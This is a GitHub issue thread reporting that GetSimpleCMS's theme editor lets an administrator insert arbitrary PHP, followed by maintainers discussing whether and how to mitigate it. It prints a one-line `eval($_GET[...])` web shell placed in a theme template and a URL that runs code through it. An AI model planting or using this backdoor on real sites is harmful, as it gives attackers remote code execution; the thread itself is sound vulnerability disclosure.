### ISSUE TITLE
In the theme editor, you can insert any php command and and execute it.

### ISSUE THREAD

**Issue by ziizhuwy** [GetSimpleCMS/GetSimpleCMS#1305]
Hello,while testing the cms,I found a issue in 3.4.0a.
This issue occurs in the theme editor.
1. I inserted this code `eval($_GET['zii']);`
before `if(defined('IN_GS')){ die('you cannot load this page directly.');`.
2. while opening the url(http://localhost/GetSimpleCMS/theme/Cardinal/template.php?zii=phpinfo();),phpinfo appeared.
![image](https://user-images.githubusercontent.com/43847458/54004164-8a6c6880-418f-11e9-9bdc-77d44ac2f4b5.png)

**Comment by cnb** [comment]
Yes, an administrator can edit theme PHP files, so of course she can insert any PHP code. Just like in e.g. Wordpress.
This is not an issue, it is a feature

**Comment by ziizhuwy** [comment]
Got it

**Comment by tablatronix** [comment]
I have no idea how to tighten the security around this, but we do have the ability in 3.4 to disable theme editing, so thats an idea, of course we can recommend htaccess control of ip, or maybe add extra protection like dual factor and priv escalation to use it

**Comment by ziizhuwy** [comment]
I agree with you,attacker will get shell according to it easily.

**Comment by tablatronix** [comment]
php lets you disable functions, but I think it is at the ini level and global. We could filter maybe
